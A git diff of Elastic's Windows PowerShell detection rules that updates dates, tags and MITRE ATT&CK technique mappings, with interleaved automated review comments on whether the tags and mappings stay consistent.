 reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-[[rule.threat.technique.subtechnique]]
-id = "T1550.002"
-name = "Pass the Hash"
-reference = "https://attack.mitre.org/techniques/T1550/002/"
-
-
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
-
diff --git a/rules/windows/defense_evasion_posh_assembly_load.toml b/rules/windows/defense_evasion_posh_assembly_load.toml
index b21cc5070cd..0282253c16e 100644
--- a/rules/windows/defense_evasion_posh_assembly_load.toml
+++ b/rules/windows/defense_evasion_posh_assembly_load.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/10/15"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
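Review bot: Removing the whole second `[[rule.threat]]` entry (T1550.002 Pass the Hash under TA0008 Lateral Movement) narrows the coverage this rule claims, and the matching tags hunk earlier in the file drops `"Tactic: Lateral Movement"` to keep tags and mapping aligned, which is good; what is not in the hunk is the rule's description and investigation guide, which for a LocalAccountTokenFilterPolicy registry change likely still explain the finding in terms of remote access with local accounts. If that narrative remains, the text and the ATT&CK mapping now disagree about why the rule matters, so either restore a Lateral Movement mapping or adjust the prose to the new T1548.002 Bypass User Account Control framing. The `[[rule.threat.technique]]` header for the T1548 block is a context line, so the technique is swapped in place; a short `# T1562 replaced by T1548.002: the policy change weakens UAC remote restrictions rather than disabling a tool` note in the commit description would help the next reader understand the re-mapping.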
@@ -148,49 +148,34 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1055"
-name = "Process Injection"
-reference = "https://attack.mitre.org/techniques/T1055/"
-[[rule.threat.technique.subtechnique]]
-id = "T1055.001"
-name = "Dynamic-link Library Injection"
-reference = "https://attack.mitre.org/techniques/T1055/001/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1055.002"
-name = "Portable Executable Injection"
-reference = "https://attack.mitre.org/techniques/T1055/002/"
-
 [[rule.threat.technique]]
 id = "T1620"
 name = "Reflective Code Loading"
 reference = "https://attack.mitre.org/techniques/T1620/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/defense_evasion_posh_compressed.toml b/rules/windows/defense_evasion_posh_compressed.toml
index 1af9d0caffa..065a298153f 100644
--- a/rules/windows/defense_evasion_posh_compressed.toml
+++ b/rules/windows/defense_evasion_posh_compressed.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/10/19"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -112,14 +112,7 @@ Setup instructions: https://ela.st/powershell-logging-setup
 This rule uses the following fields that require the Windows Integration v3.3.0 and up: `powershell.file.script_block_entropy_bits`.
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Resources: Investigation Guide",
- "Data Source: PowerShell Logs",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -149,6 +142,7 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
@@ -159,29 +153,28 @@ id = "T1140"
 name = "Deobfuscate/Decode Files or Information"
 reference = "https://attack.mitre.org/techniques/T1140/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/defense_evasion_posh_defender_tampering.toml b/rules/windows/defense_evasion_posh_defender_tampering.toml
index c4d50b64d01..f0dfa740cda 100644
--- a/rules/windows/defense_evasion_posh_defender_tampering.toml
+++ b/rules/windows/defense_evasion_posh_defender_tampering.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/09/11"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -144,39 +144,21 @@ not user.id : "S-1-5-18"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.001"
-name = "PowerShell"
-reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/defense_evasion_posh_encryption.toml b/rules/windows/defense_evasion_posh_encryption.toml
index c5e38dabe16..6e4a932d0bc 100644
--- a/rules/windows/defense_evasion_posh_encryption.toml
+++ b/rules/windows/defense_evasion_posh_encryption.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/01/23"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
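Review bot: The defense_evasion_posh_defender_tampering.toml hunk deletes the entire TA0002 Execution `[[rule.threat]]` entry (T1059.001 PowerShell), but unlike the other PowerShell rules in this chunk no tags hunk for this file appears here, so I cannot see whether `tags` still carries `"Tactic: Execution"`. If it does, the tags now name a tactic the threat mapping no longer contains, which is exactly the tag/mapping drift the rest of this change is cleaning up; please confirm the tags array for this rule was updated in the same commit or that it never listed Execution. A one-line mention in the commit description of why Execution was dropped for this rule while it was added for the sibling posh_* rules would also help, since the decision is otherwise invisible.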
@@ -97,14 +97,7 @@ This behavior can be legitimate (protecting configuration values, packaging cont
 risk_score = 47
 rule_id = "1d9aeb0b-9549-46f6-a32d-05e2a001b7fd"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Data Source: PowerShell Logs",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Impact", "Data Source: PowerShell Logs", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -140,22 +133,29 @@ event.category:process and host.os.type:windows and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1027"
-name = "Obfuscated Files or Information"
-reference = "https://attack.mitre.org/techniques/T1027/"
 [[rule.threat.technique]]
 id = "T1140"
 name = "Deobfuscate/Decode Files or Information"
 reference = "https://attack.mitre.org/techniques/T1140/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1486"
+name = "Data Encrypted for Impact"
+reference = "https://attack.mitre.org/techniques/T1486/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/defense_evasion_posh_high_entropy.toml b/rules/windows/defense_evasion_posh_high_entropy.toml
index 4519eaa5024..97903280a6b 100644
--- a/rules/windows/defense_evasion_posh_high_entropy.toml
+++ b/rules/windows/defense_evasion_posh_high_entropy.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/08"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/01/08"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
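Review bot: Adding T1486 Data Encrypted for Impact under TA0040 asserts destructive intent for a rule whose own context line in the first hunk says the matched behavior "can be legitimate (protecting configuration values, packaging cont…)", and which stays at `risk_score = 47` / `severity = "medium"`; every benign hit will now count toward Impact/ransomware coverage in any tactic-based dashboard or ATT&CK navigator export. If the Impact mapping is intentional, the description and investigation guide (outside this hunk) should state what distinguishes an Impact-relevant encryption call from the obfuscation case the rule was originally mapped to, so triage does not treat a medium-severity obfuscation signal as a ransomware indicator. Otherwise keeping the rule on Defense Evasion alone, with `"Tactic: Impact"` removed from the new tags line, would be the more conservative mapping; note that T1027 Obfuscated Files or Information is also dropped here, leaving only T1140 for the evasion side.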
@@ -115,14 +115,7 @@ Setup instructions: https://ela.st/powershell-logging-setup
 This rule uses the following fields that require the Windows Integration v3.3.0 and up: `powershell.file.script_block_entropy_bits`, `powershell.file.script_block_surprisal_stdev`, and `powershell.file.script_block_length`.
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Data Source: PowerShell Logs",
- "Resources: Investigation Guide"
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -142,40 +135,39 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
-[[rule.threat.technique]]
-id = "T1140"
-name = "Deobfuscate/Decode Files or Information"
-reference = "https://attack.mitre.org/techniques/T1140/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/defense_evasion_posh_obfuscation.toml b/rules/windows/defense_evasion_posh_obfuscation.toml
index 3f18767f36a..65d2f5c7b65 100644
--- a/rules/windows/defense_evasion_posh_obfuscation.toml
+++ b/rules/windows/defense_evasion_posh_obfuscation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/03"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -59,14 +59,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Data Source: PowerShell Logs",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -122,36 +115,36 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
-[[rule.threat.technique]]
-id = "T1140"
-name = "Deobfuscate/Decode Files or Information"
-reference = "https://attack.mitre.org/techniques/T1140/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
diff --git a/rules/windows/defense_evasion_posh_obfuscation_backtick.toml b/rules/windows/defense_evasion_posh_obfuscation_backtick.toml
index 98b2aa03bc7..be379bc9284 100644
--- a/rules/windows/defense_evasion_posh_obfuscation_backtick.toml
+++ b/rules/windows/defense_evasion_posh_obfuscation_backtick.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/15"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -109,14 +109,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Data Source: PowerShell Logs",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -167,39 +160,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
-[[rule.threat.technique]]
-id = "T1140"
-name = "Deobfuscate/Decode Files or Information"
-reference = "https://attack.mitre.org/techniques/T1140/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml b/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml
index 8f1bd286cb1..47250fb084a 100644
--- a/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml
+++ b/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/16"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -100,14 +100,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Data Source: PowerShell Logs",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -151,39 +144,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
-[[rule.threat.technique]]
-id = "T1140"
-name = "Deobfuscate/Decode Files or Information"
-reference = "https://attack.mitre.org/techniques/T1140/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml b/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml
index c138be71ed7..145c241a756 100644
--- a/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml
+++ b/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/14"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -82,14 +82,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Data Source: PowerShell Logs",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -134,39 +127,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
-[[rule.threat.technique]]
-id = "T1140"
-name = "Deobfuscate/Decode Files or Information"
-reference = "https://attack.mitre.org/techniques/T1140/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml b/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml
index 4b1409da8c8..768f4aeb483 100644
--- a/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml
+++ b/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/15"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -112,14 +112,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Data Source: PowerShell Logs",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -161,39 +154,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
-[[rule.threat.technique]]
-id = "T1140"
-name = "Deobfuscate/Decode Files or Information"
-reference = "https://attack.mitre.org/techniques/T1140/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml b/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml
index 9f3f14ce734..4bc50165fbf 100644
--- a/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml
+++ b/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/16"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -79,14 +79,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Data Source: PowerShell Logs",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -147,39 +140,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
-[[rule.threat.technique]]
-id = "T1140"
-name = "Deobfuscate/Decode Files or Information"
-reference = "https://attack.mitre.org/techniques/T1140/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml b/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml
index 68743a18154..7f5472b2a96 100644
--- a/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml
+++ b/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/16"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -95,14 +95,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Data Source: PowerShell Logs",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -149,39 +142,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
-[[rule.threat.technique]]
-id = "T1140"
-name = "Deobfuscate/Decode Files or Information"
-reference = "https://attack.mitre.org/techniques/T1140/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml b/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml
index 7ee84b163a3..e3e40c756d6 100644
--- a/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml
+++ b/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/16"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
